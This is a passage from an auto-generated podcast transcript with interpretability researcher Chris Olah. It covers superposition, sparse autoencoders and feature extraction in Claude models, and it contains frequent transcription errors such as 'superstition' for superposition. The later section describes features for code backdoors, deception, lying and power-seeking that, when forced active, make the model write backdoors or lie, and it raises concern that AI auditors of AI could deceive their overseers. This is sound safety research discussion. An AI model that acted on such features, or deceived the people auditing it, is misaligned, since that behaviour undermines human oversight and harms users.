04:46:59.100 | threshold for what you're willing to accept in terms of how much cosine similarity there is,
04:47:04.700 | that's actually exponential in the number of neurons that you have. So, at some point,
04:47:08.540 | that's not going to even be the limiting factor. But, you know, there's some beautiful results
04:47:12.780 | there. In fact, it's probably even better than that in some sense, because that's sort of for
04:47:17.420 | saying that, you know, any random set of features could be active. But, in fact, the features have
04:47:21.420 | sort of a correlational structure where some features, you know, are more likely to co-occur,
04:47:25.420 | and other ones are less likely to co-occur. And so, neural networks, my guess would be,
04:47:28.940 | can do very well in terms of going and packing things in, to the point that that's probably
04:47:35.660 | not the limiting factor. How does the problem of polysemanticity enter the picture here?
04:47:40.940 | Polysemanticity is this phenomenon we observe, where we look at many neurons,
04:47:44.300 | and the neuron doesn't just sort of represent one concept. It's not a clean feature. It responds to
04:47:49.660 | a bunch of unrelated things. And superposition, you can think of as being a hypothesis that explains
04:47:55.500 | the observation of polysemanticity. So, polysemanticity is this observed phenomenon,
04:48:01.180 | and superposition is a hypothesis that would explain it, along with some other things.
04:48:05.580 | So, that makes McInturb more difficult.
04:48:08.620 | Right. So, if you're trying to understand things in terms of individual neurons,
04:48:11.820 | and you have polysemantic neurons, you're in an awful lot of trouble, right? I mean,
04:48:15.660 | the easiest answer is like, okay, well, you're looking at the neurons. You're trying to understand
04:48:18.700 | them. This one responds to a lot of things. It doesn't have a nice meaning. Okay, that's bad.
04:48:23.820 | Another thing you could ask is, ultimately, we want to understand the weights. And if you have
04:48:28.380 | two polysemantic neurons, and each one responds to three things, and then the other neuron
04:48:33.020 | responds to three things, and you have a weight between them, what does that mean? Does it mean
04:48:36.220 | that like all three, you know, like there's these nine interactions going on? It's a very weird
04:48:41.260 | thing. But there's also a deeper reason, which is related to the fact that neural networks operate
04:48:46.460 | on really high dimensional spaces. So, I said that our goal was, you know, to understand neural
04:48:50.540 | networks and understand the mechanisms. And one thing you might say is like, well, why not? It's
04:48:55.420 | just a mathematical function. Why not just look at it, right? Like, you know, one of the earliest
04:48:59.180 | projects I did studied these neural networks that mapped two-dimensional spaces to two-dimensional
04:49:03.180 | spaces. And you can sort of interpret them in this beautiful way as like bending manifolds.
04:49:07.260 | Why can't we do that? Well, you know, as you have a higher dimensional space,
04:49:11.660 | the volume of that space in some senses is exponential in the number of inputs you have.
04:49:17.500 | And so, you can't just go and visualize that. So, we somehow need to break that apart. We need to
04:49:22.380 | somehow break that exponential space into a bunch of things that we, you know, some non-exponential
04:49:28.540 | number of things that we can reason about independently. And the independence is crucial
04:49:33.340 | because it's the independence that allows you to not have to think about, you know,
04:49:36.380 | all the exponential combinations of things. And things being monosemantic, things only having
04:49:43.340 | one meaning, things having a meaning, that is the key thing that allows you to think about
04:49:48.140 | them independently. And so, I think that's -- if you want the deepest reason why we want to have
04:49:55.340 | interpretable monosemantic features, I think that's really the deep reason.
04:49:58.540 | >> And so, the goal here, as your recent work has been aiming at, is how do we extract the
04:50:03.580 | monosemantic features from a neural net that has polysemantic features and all this mess?
04:50:09.980 | >> Yes, we observe these polysematic neurons and we hypothesize that what's going on is
04:50:14.060 | superstition. And if superstition is what's going on, there's actually a sort of well-established
04:50:19.340 | technique that is sort of the principled thing to do, which is dictionary learning. And it turns
04:50:25.020 | out if you do dictionary learning, in particular, if you do sort of a nice, efficient way that in
04:50:29.180 | some sense sort of nicely regularizes it as well, called a sparse autoencoder, if you train a sparse
04:50:33.740 | autoencoder, these beautiful interpretable features start to just fall out where there
04:50:37.660 | weren't any beforehand. And so, that's not a thing that you would necessarily predict, right?
04:50:42.700 | But it turns out that that works very, very well. To me, that seems like some non-trivial validation
04:50:49.260 | of linear representations and superstition. >> So, with dictionary learning, you're not
04:50:53.180 | looking for particular kind of categories. You don't know what they are. They just emerge.
04:50:56.940 | >> Exactly, yeah. And this gets back to our earlier point, right? When we're not making
04:50:59.420 | assumptions, gradient descent is smarter than us. So, we're not making assumptions about what's
04:51:02.940 | there. I mean, one certainly could do that, right? One could assume that there's a PHP feature and go
04:51:08.540 | and search for it. But we're not doing that. We're saying we don't know what's going to be there.
04:51:11.900 | Instead, we're just going to go and let the sparse autoencoder discover the things that are there.
04:51:15.900 | >> So, can you talk to the toward monosemanticity paper from October last year? They had a lot of
04:51:22.460 | like nice breakthrough results. >> That's very kind of you to describe it that way. Yeah, I mean,
04:51:26.380 | this was our first real success using sparse autoencoders. So, we took a one-layer model.
04:51:33.820 | And it turns out, if you go and you do dictionary learning on it, you find all these really nice
04:51:39.660 | interpretable features. So, the Arabic feature, the Hebrew feature, the base64 feature. Those
04:51:44.860 | were some examples that we studied in a lot of depth and really showed that they were
04:51:49.340 | what we thought they were. It turns out, if you train a model twice as well and train two different
04:51:52.540 | models and do dictionary learning, you find analogous features in both of them. So, that's fun.
04:51:56.380 | You find all kinds of different features. So, that was really just showing that this works. And I
04:52:03.660 | should mention that there was this Cunningham et al that had very similar results around the same
04:52:08.140 | time. >> There's something fun about doing these kinds of small-scale experiments and finding that
04:52:13.340 | it's actually working. >> Yeah, well, and there's so much structure here. So, maybe
04:52:19.100 | stepping back for a while, I thought that maybe all this mechanistic interpretability work,
04:52:25.020 | the end result was going to be that I would have an explanation for why it was very hard and not
04:52:30.540 | going to be tractable. We'd be like, "Well, there's this problem with supersession. And it
04:52:34.300 | turns out supersession is really hard, and we're kind of screwed." But that's not what happened.
04:52:38.700 | In fact, a very natural, simple technique just works. And so, then that's actually a very good
04:52:43.820 | situation. I think this is a sort of hard research problem, and it's got a lot of research risk. And
04:52:49.500 | you know, it might still very well fail. But I think that some very significant amount of research
04:52:54.540 | risk was sort of put behind us when that started to work. >> Can you describe what kind of features
04:53:00.460 | can be extracted in this way? >> Well, so, it depends on the model that you're studying, right?
04:53:05.020 | So, the larger the model, the more sophisticated they're going to be. And we'll probably talk about
04:53:08.860 | follow-up work in a minute. But in these one-layer models, so, some very common things, I think,
04:53:13.820 | were languages, both programming languages and natural languages. There were a lot of features
04:53:18.860 | that were specific words in specific contexts. So, "the," and I think really the way to think
04:53:24.060 | about this is that "the" is likely about to be followed by a noun. So, it's really, you could
04:53:28.460 | think of this as "the" feature, but you could also think of this as producing a specific noun feature.
04:53:31.980 | And there would be these features that would fire for "the" in the context of, say, a legal document
04:53:38.220 | or a mathematical document or something like this. And so, maybe in the context of math,
04:53:45.660 | you're like, "the" and then predict vector or matrix, all these mathematical words,
04:53:50.220 | whereas in other contexts, you would predict other things. That was common.
04:53:53.740 | >> And basically, we need clever humans to assign labels to what we're seeing.
04:53:59.820 | >> Yes. So, the only thing this is doing is it's sort of unfolding things for you. So,
04:54:05.900 | if everything was sort of folded over top of it, you know, serialization folded everything on top
04:54:09.660 | of itself, and you can't really see it, this is unfolding it. But now you still have a very
04:54:14.140 | complex thing to try to understand. So, then you have to do a bunch of work understanding what
04:54:18.060 | these are. And some of them are really subtle. Like, there's some really cool things, even in
04:54:22.860 | this one-layer model about Unicode, where, you know, of course, some languages are in Unicode,
04:54:27.580 | and the tokenizer won't necessarily have a dedicated token for every Unicode character.
04:54:33.580 | So, instead, what you'll have is you'll have these patterns of alternating tokens that each
04:54:38.460 | represent half of a Unicode character. And you have a different feature that, you know, goes and
04:54:42.620 | activates on the opposing ones to be like, okay, you know, I just finished a character, you know,
04:54:46.940 | go and predict next prefix. Then, okay, I'm on the prefix, you know, predict a reasonable suffix,
04:54:52.540 | and you have to alternate back and forth. So, there's, you know, these one-layer models are
04:54:57.180 | really interesting. And I mean, there's another thing, which is, you might think, okay, there
04:55:01.020 | would just be one Base64 feature. But it turns out, there's actually a bunch of Base64 features,
04:55:05.420 | because you can have English text encoded as Base64, and that has a very different distribution
04:55:11.180 | of Base64 tokens than regular. And there's some things about tokenization as well that
04:55:17.900 | it can exploit, and I don't know, there's all kinds of fun stuff.
04:55:21.100 | How difficult is the task of sort of assigning labels
04:55:24.380 | to what's going on? Can this be automated by AI?
04:55:28.220 | Well, I think it depends on the feature. And it also depends on how much you trust your AI.
04:55:31.980 | So, there's a lot of work doing automated interoperability. I think that's a really
04:55:37.340 | exciting direction. And we do a fair amount of automated interoperability and have
04:55:41.100 | Claude go and label our features.
04:55:42.780 | Is there some funny moments where it's totally right or it's totally wrong?
04:55:47.260 | Yeah, well, I think it's very common that it's like, says something very general,
04:55:52.780 | which is like, true in some sense, but not really picking up on the specific of what's going on.
04:55:58.220 | So, I think that's a pretty common situation.
04:56:02.780 | You don't know that I have a particularly amusing one.
04:56:06.220 | That's interesting, that little gap between it is true,
04:56:08.780 | but it doesn't quite get to the deep nuance of a thing. That's a general challenge. It's like,
04:56:16.860 | it's already an incredible costume that can say a true thing, but it's missing
04:56:22.780 | the depth sometimes. And in this context, it's like the arc challenge, the sort of IQ type of tests.
04:56:29.020 | It feels like figuring out what a feature represents is a little puzzle you have to solve.
04:56:35.660 | Yeah. And I think that sometimes they're easier and sometimes they're harder as well.
04:56:38.620 | So, yeah, I think that's tricky. And there's another thing, which I don't know, maybe in
04:56:45.420 | some ways, this is my aesthetic coming in, but I'll try to give you a rationalization.
04:56:49.660 | I'm actually a little suspicious of automated interoperability. And I think that's partly just
04:56:53.340 | that I want humans to understand neural networks. And if the neural network is understanding it for
04:56:57.500 | me, I don't quite like that. But I do have a bit of, in some ways, I'm sort of like the
04:57:02.220 | mathematicians who are like, if there's a computer automated proof, it doesn't count.
04:57:05.020 | They won't understand it. But I do also think that there's this kind of reflections on trusting
04:57:11.580 | trust type issue, where there's this famous talk about when you're writing a computer program,
04:57:19.340 | you have to trust your compiler. And if there was like malware in your compiler,
04:57:22.620 | then it could go and inject malware into the next compiler and you'd be kind of in trouble, right?
04:57:27.100 | Well, if you're using neural networks to go and verify that your neural networks are safe,
04:57:32.700 | the hypothesis that you're testing for is like, okay, well, the neural network maybe isn't safe.
04:57:36.140 | And you have to worry about like, is there some way that it could be screwing with you?
04:57:40.700 | So, I think that's not a big concern now. But I do wonder in the long run, if we have to use
04:57:46.380 | really powerful AI systems to go and audit our AI systems, is that actually something we can trust?
04:57:53.100 | But maybe I'm just rationalizing because I just want us to have to get to a point where humans
04:57:57.100 | understand everything. Yeah. I mean, especially, that's hilarious, especially as we talk about AI
04:58:01.820 | safety and looking for features that would be relevant to AI safety, like deception and so on.
04:58:07.740 | So, let's talk about the scaling monosemanticity paper in May 2024. Okay. So, what did it take to
04:58:14.380 | scale this, to apply to Cloud 3? Well, a lot of GPUs. A lot more GPUs. But one of my teammates,
04:58:22.380 | Tom Hennigan, was involved in the original scaling loss work. And something that he was sort of
04:58:29.660 | interested in from very early on is, are there scaling laws for interoperability?
04:58:36.060 | And so, something he sort of immediately did when this work started to succeed, and we started to
04:58:42.060 | have sparse autoencoders work, was he became very interested in, what are the scaling laws
04:58:46.060 | for making sparse autoencoders larger? And how does that relate to making the base model larger?
04:58:54.140 | And so, it turns out this works really well. And you can use it to sort of project,
04:58:58.780 | if you train a sparse autoencoder at a given size, how many tokens should you train on? And so on.
04:59:04.220 | So, this was actually a very big help to us in scaling up this work, and made it a lot easier
04:59:09.500 | for us to go and train really large sparse autoencoders, where it's not like training
04:59:15.180 | the big models, but it's starting to get to a point where it's actually expensive to go
04:59:18.700 | and train the really big ones. So, you have to do all this stuff of splitting it across
04:59:24.540 | large GPUs. Oh, yeah. I mean, there's a huge engineering challenge here too, right? So,
04:59:28.620 | yeah. So, there's a scientific question of how do you scale things effectively? And then there's
04:59:33.420 | an enormous amount of engineering to go and scale this up. So, you have to chart it, you have to
04:59:37.980 | think very carefully about a lot of things. And I'm lucky to work with a bunch of great engineers,
04:59:41.580 | because I am definitely not a great engineer. Yeah. And the infrastructure, especially. Yeah,
04:59:44.700 | for sure. So, it turns out, TODR, it worked. It worked. Yeah. And I think this is important,
04:59:50.780 | because you could have imagined a world where you set after towards monosemanticity.
04:59:55.420 | You know, Chris, this is great. It works on a one-layer model. But one-layer models are
04:59:59.740 | really idiosyncratic. Maybe the linear representation hypothesis and superposition
05:00:05.660 | hypothesis is the right way to understand a one-layer model, but it's not the right way
05:00:09.020 | to understand larger models. And so, I think, I mean, first of all, the Cunningham et al paper
05:00:14.860 | cut through that a little bit and suggested that this wasn't the case. But scaling monosemanticity,
05:00:21.020 | I think, was significant evidence that even for very large models, and we did it on Claude III
05:00:25.340 | Sonnet, which at that point was one of our production models, you know, even these models
05:00:30.860 | seem to be very, you know, seem to be substantially explained, at least, by linear features and,
05:00:37.740 | you know, doing dictionary learning on the works. And as you learn more features, you go and you
05:00:40.700 | explain more and more. So, that's, I think, quite a promising sign. And you find now really
05:00:47.260 | fascinating abstract features. And the features are also multimodal. They respond to images and
05:00:52.860 | text for the same concept, which is fun. - Yeah. Can you explain that? I mean, like,
05:00:57.340 | you know, backdoor, there's just a lot of examples that you can...
05:01:00.700 | - Yeah. So, maybe let's start with one example to start, which is we found some features around,
05:01:05.420 | sort of, security vulnerabilities and backdoors in code. So, it turns out those are actually two
05:01:08.860 | different features. So, there's a security vulnerability feature. And if you force it
05:01:13.260 | active, Claude will start to go and write security vulnerabilities like buffer overflows into code.
05:01:19.100 | And also, it fires for all kinds of things. Like, you know, some of the top dataset examples for it
05:01:23.500 | were things like, you know, dash, dash, disable, you know, SSL or something like this, which are
05:01:29.420 | sort of obviously really insecure. - So, at this point, it's kind of like,
05:01:35.900 | maybe it's just because the examples are presented that way, it's kind of like surface, a little bit
05:01:40.300 | more obvious examples, right? I guess the idea is that down the line, it might be able to detect
05:01:47.180 | more nuanced, like deception or bugs or that kind of stuff.
05:01:50.460 | - Yeah. Well, maybe I want to distinguish two things. So, one is the complexity of the feature
05:01:56.780 | or the concept, right? And the other is the nuance of how subtle the examples we're looking at,
05:02:04.620 | right? So, when we show the top dataset examples, those are the most extreme examples that cause
05:02:09.820 | that feature to activate. And so, it doesn't mean that it doesn't fire for more subtle things.
05:02:15.180 | So, the insecure code feature, you know, the stuff that it fires for most strongly for are these,
05:02:21.420 | like, really obvious, you know, disable the security type things. But, you know, it also
05:02:29.420 | fires for, you know, buffer overflows and more subtle security vulnerabilities in code. You know,
05:02:35.660 | these features are all multimodal. So, you could ask, like, what images activate this feature?
05:02:39.820 | And it turns out that the security vulnerability feature activates for images of, like, people
05:02:47.740 | clicking on Chrome to, like, go past the, like, you know, this website, the SSL certificate might
05:02:53.900 | be wrong or something like this. Another thing that's very entertaining is there's backdoors
05:02:56.860 | in code feature. Like, you activate it, it goes on, Cloud writes a backdoor that, like, will go
05:03:00.060 | and dump your data to port or something. But you can ask, okay, what images activate the backdoor
05:03:05.260 | feature? It was devices with hidden cameras in them. So, there's a whole, apparently, genre of
05:03:11.260 | people going and selling devices that look innocuous, that have hidden cameras, and they
05:03:14.860 | have ads about how there's a hidden camera in it. And I guess that is the, you know, physical
05:03:19.180 | version of a backdoor. And so, it sort of shows you how abstract these concepts are, right?
05:03:23.660 | And I just thought that was, I'm sort of sad that there's a whole market of people selling devices
05:03:29.900 | like that. But I was kind of delighted that that was the thing that it came up with as the top
05:03:34.460 | image examples for the feature. - Yeah, it's nice. It's multimodal. It's multi-almost context. It's
05:03:39.260 | broad, strong definition of a singular concept. It's nice. - Yeah. - To me, one of the really
05:03:45.740 | interesting features, especially for AI safety, is deception and lying. And the possibility that
05:03:52.700 | these kinds of methods could detect lying in a model, especially gets smarter and smarter and
05:03:57.900 | smarter. Presumably, that's a big threat of a super intelligent model that it can deceive
05:04:04.380 | the people operating it, as to its intentions or any of that kind of stuff. So, what have you
05:04:10.700 | learned from detecting lying inside models? - Yeah. So, I think we're, in some ways, in early
05:04:16.060 | days for that. We find quite a few features related to deception and lying. There's one feature
05:04:23.500 | where it fires for people lying and being deceptive, and you force it active, and Claude starts lying
05:04:28.940 | to you. So, we have a deception feature. I mean, there's all kinds of other features about
05:04:33.580 | withholding information and not answering questions. Features about power-seeking and
05:04:37.580 | coups and stuff like that. There's a lot of features that are kind of related to spooky
05:04:41.980 | things. And if you force them active, Claude will behave in ways that are not the kinds of
05:04:48.460 | behaviors you want. - What are possible next exciting directions to you in the space of
05:04:55.180 | Macintype? - Well, there's a lot of things.
05:04:57.180 | So, for one thing, I would really like to get to a point where we have shortcuts, where we can
05:05:05.820 | really understand not just the features, but then use that to understand the computation of models.
05:05:12.300 | That really, for me, is the ultimate goal of this. And there's been some work. We put out a few
05:05:19.420 | things. There's a paper from Sam Marks that does some stuff like this. There's been some, I'd say,
05:05:23.580 | some work around the edges here. But I think there's a lot more to do. And I think that will be
05:05:27.740 | a very exciting thing. That's related to a challenge we call interference weights, where
05:05:35.100 | due to superstition, if you just sort of naively look at whether features are connected together,
05:05:40.940 | there may be some weights that sort of don't exist in the upstairs model, but are just sort
05:05:45.180 | of artifacts of superstition. So, that's a sort of technical challenge related to that.
05:05:52.620 | I think another exciting direction is just, you might think of sparse autoencoders as being
05:05:58.940 | kind of like a telescope. They allow us to look out and see all these features that are out there.
05:06:05.980 | And as we build better and better sparse autoencoders, get better and better at dictionary
05:06:10.060 | learning, we see more and more stars. And we zoom in on smaller and smaller stars. But there's kind
05:06:16.460 | of a lot of evidence that we're only still seeing a very small fraction of the stars. There's a lot
05:06:21.740 | of matter in our neural network universe that we can't observe yet. And it may be that we'll never
05:06:29.100 | be able to have fine enough instruments to observe it. And maybe some of it just isn't possible,
05:06:32.780 | isn't computationally tractable to observe. It's sort of a kind of dark matter, not in maybe the
05:06:38.700 | sense of modern astronomy, but of earlier astronomy, when we didn't know what this
05:06:41.740 | unexplained matter is. And so, I think a lot about that dark matter and whether we'll ever
05:06:46.540 | observe it, and what that means for safety if we can't observe it, if some significant fraction of
05:06:52.700 | neural networks are not accessible to us. Another question that I think a lot about is,
05:06:58.700 | at the end of the day, mechanistic interpolation is this very microscopic
05:07:04.300 | approach to interpolation. It's trying to understand things in a very fine-grained way.
05:07:09.100 | But a lot of the questions we care about are very macroscopic. We care about these questions about
05:07:14.940 | neural network behavior. And I think that's the thing that I care most about. But there's lots of
05:07:20.460 | other sort of larger scale questions you might care about. And somehow, the nice thing about
05:07:28.460 | having a very microscopic approach is it's maybe easier to ask, is this true? But the downside is,
05:07:33.180 | it's much further from the things we care about. And so, we now have this ladder to climb. And I
05:07:37.340 | think there's a question of, will we be able to find, are there sort of larger scale abstractions
05:07:42.140 | that we can use to understand neural networks that we get up from this very microscopic approach?
05:07:47.420 | Yeah, you've written about this, this kind of organs question.
05:07:52.300 | Yeah, exactly.
05:07:53.340 | If we think of interpretability as a kind of anatomy of neural networks, most of the
05:07:58.860 | circus threads involve studying tiny little veins, looking at the small scale, and individual neurons
05:08:04.220 | and how they connect. However, there are many natural questions that the small scale approach
05:08:08.860 | doesn't address. In contrast, the most prominent abstractions in biological anatomy involve larger
05:08:15.340 | scale structures, like individual organs, like the heart, or entire organ systems,
05:08:20.460 | like the respiratory system. And so, we wonder, is there a respiratory system or heart or brain
05:08:27.180 | region of an artificial neural network?
05:08:29.020 | Yeah, exactly. And I mean, like, if you think about science, right, a lot of scientific fields
05:08:33.820 | have, you know, investigate things at many levels of abstractions. In biology, you have like,
05:08:38.780 | you know, molecular biology studying proteins and molecules and so on. And they have cellular
05:08:43.260 | biology, and then you have histology studying tissues, and then you have anatomy, and then you
05:08:47.740 | have zoology, and then you have ecology. And so, you have many, many levels of abstraction. Or,
05:08:52.460 | you know, physics, maybe the physics of individual particles, and then, you know, statistical physics
05:08:56.540 | gives you thermodynamics and things like this. And so, you often have different levels of
05:08:59.980 | abstraction. And I think that right now we have, you know, mechanistic interpretability, if it
05:09:05.820 | succeeds, is sort of like a microbiology of neural networks. But we want something more like anatomy.
05:09:12.060 | And so, and, you know, a question you might ask is, why can't you just go there directly? And I
05:09:16.380 | think the answer is superposition, at least in a significant part. It's that it's actually very hard
05:09:21.100 | to see this macroscopic structure without first sort of breaking down the microscopic structure
05:09:27.900 | in the right way, and then studying how it connects together. But I'm hopeful that there
05:09:32.060 | is going to be something much larger than features and circuits, and that we're going to be able to
05:09:37.420 | have a story that's much, that involves much bigger things. And then you can sort of study
05:09:42.140 | in detail the parts you care about. I suppose in your biology, like a psychologist or psychiatrist
05:09:47.340 | of a neural network. And I think that the beautiful thing would be if we could go and,
05:09:52.060 | rather than having disparate fields for those two things, if you could have a, build a bridge
05:09:56.140 | between them, such that you could go and have all of your higher level abstractions be grounded very
05:10:03.420 | firmly in this very solid, you know, more rigorous, ideally, foundation. What do you think is the
05:10:11.740 | difference between the human brain, the biological neural network, and the artificial neural network?
05:10:17.580 | Well, the neuroscientists have a much harder job than us. You know, sometimes I just like count
05:10:21.660 | my blessings by how much easier my job is than the neuroscientists, right? So I have, we can record
05:10:26.940 | from all the neurons. We can do that on arbitrary amounts of data. The neurons don't change while
05:10:32.780 | you're doing that, by the way. You can go and ablate neurons, you can edit the connections and
05:10:37.820 | so on. And then you can undo those changes. That's pretty great. You can force any, you can intervene
05:10:43.420 | on any neuron and force it active and see what happens. You know which neurons are connected
05:10:47.660 | to everything, right? Neuroscientists want to get the connectome, we have the connectome.
05:10:50.860 | And we have it for like much bigger than C. elegans. And then not only do we have the connectome,
05:10:55.900 | we know what the, you know, which neurons excite or inhibit each other, right? So we have,
05:11:00.780 | it's not just that we know that like the binary mask, we know the weights. We can take gradients,
05:11:05.660 | we know computationally what each neuron does. So I don't know, the list goes on and on. We just have
05:11:10.620 | so many advantages over neuroscientists. And then just by having all those advantages,
05:11:16.940 | it's really hard. And so one thing I do sometimes think is like, gosh, like,
05:11:21.260 | if it's this hard for us, it seems impossible under the constraints of neuroscience or,
05:11:24.940 | you know, near impossible. I don't know, maybe part of me is like I've got a few neuroscientists
05:11:29.660 | on my team. Maybe I'm sort of like, ah, you know, maybe the neuroscientists, maybe some of them
05:11:35.020 | would like to have an easier problem that's still very hard. And they could come and work on neural
05:11:40.460 | networks. And then after we figure out things in sort of the easy little pond of trying to
05:11:45.580 | understand neural networks, which is still very hard, then we could go back to biological
05:11:49.740 | neuroscience. - I love what you've written about the goal of McInterp research as two goals,
05:11:56.220 | safety and beauty. So can you talk about the beauty side of things? - Yeah. So, you know,
05:12:00.780 | there's this funny thing where I think some people want, some people are kind of disappointed by
05:12:06.140 | neural networks, I think, where they're like, ah, you know, neural networks, it's just these simple
05:12:11.260 | rules. And then you just like do a bunch of engineering to scale it up and it works really
05:12:14.300 | well. And like, where's the like complex ideas? You know, this isn't like a very nice, beautiful
05:12:18.940 | scientific result. And I sometimes think when people say that, I picture them being like, you
05:12:24.460 | know, evolution is so boring. It's just a bunch of simple rules and you run evolution for a long
05:12:29.020 | time and you get biology. Like what a sucky, you know, way for biology to have turned out. Where's
05:12:34.380 | the complex rules? But the beauty is that the simplicity generates complexity. You know,
05:12:41.260 | biology has these simple rules and it gives rise to, you know, all the life and ecosystems that we
05:12:47.100 | see around us, all the beauty of nature that all just comes from evolution and from something very
05:12:52.140 | simple evolution. And similarly, I think that neural networks build, create enormous complexity
05:12:58.940 | and beauty inside and structure inside themselves that people generally don't look at and don't try
05:13:04.220 | to understand because it's hard to understand. But I think that there is an incredibly rich
05:13:10.220 | structure to be discovered inside neural networks. A lot of very deep beauty. And if we're just
05:13:16.700 | willing to take the time to go and see it and understand it. Yeah, I love McInterp. The feeling
05:13:22.860 | like we are understanding or getting glimpses of understanding the magic that's going on inside is
05:13:28.780 | really wonderful. It feels to me like one of the questions that's just calling out to be asked,
05:13:34.940 | and I'm sort of, I mean, a lot of people are thinking about this, but I'm often surprised
05:13:38.780 | that not more are, is how is it that we don't know how to create computer systems that can do these
05:13:44.620 | things? And yet we have these amazing systems that we don't know how to directly create computer
05:13:50.060 | programs that can do these things, but these neural networks can do all these amazing things.
05:13:53.100 | And it just feels like that is obviously the question that sort of is calling out to be
05:13:56.780 | answered. If you are, if you have any degree of curiosity, it's like, how is it that humanity
05:14:02.860 | now has these artifacts that can do these things that we don't know how to do?
05:14:06.140 | Yeah. I love the image of the circus reaching towards the light of the objective function.
05:14:11.020 | Yeah. It's just, it's this organic thing that we've grown and we have no idea what we've grown.
05:14:15.180 | Well, thank you for working on safety and thank you for appreciating the beauty of the things you
05:14:20.140 | discover. And thank you for talking today, Chris. It's wonderful.
05:14:23.660 | Thank you for taking the time to chat as well.
05:14:25.820 | Thanks for listening to this conversation with Chris Ola. And before that,
05:14:28.940 | with Daria Almoday and Amanda Askel. To support this podcast, please check out our sponsors
05:14:34.300 | in the description. And now let me leave you with some words from Alan Watts.
05:14:38.620 | "The only way to make sense out of change is to plunge into it, move with it, and join the dance."
05:14:46.860 | Thank you for listening and hope to see you next time.
05:14:51.180 | [END]
05:14:52.560 | Transcribed by https://otter.ai
05:14:54.020 | Transcribed by https://otter.ai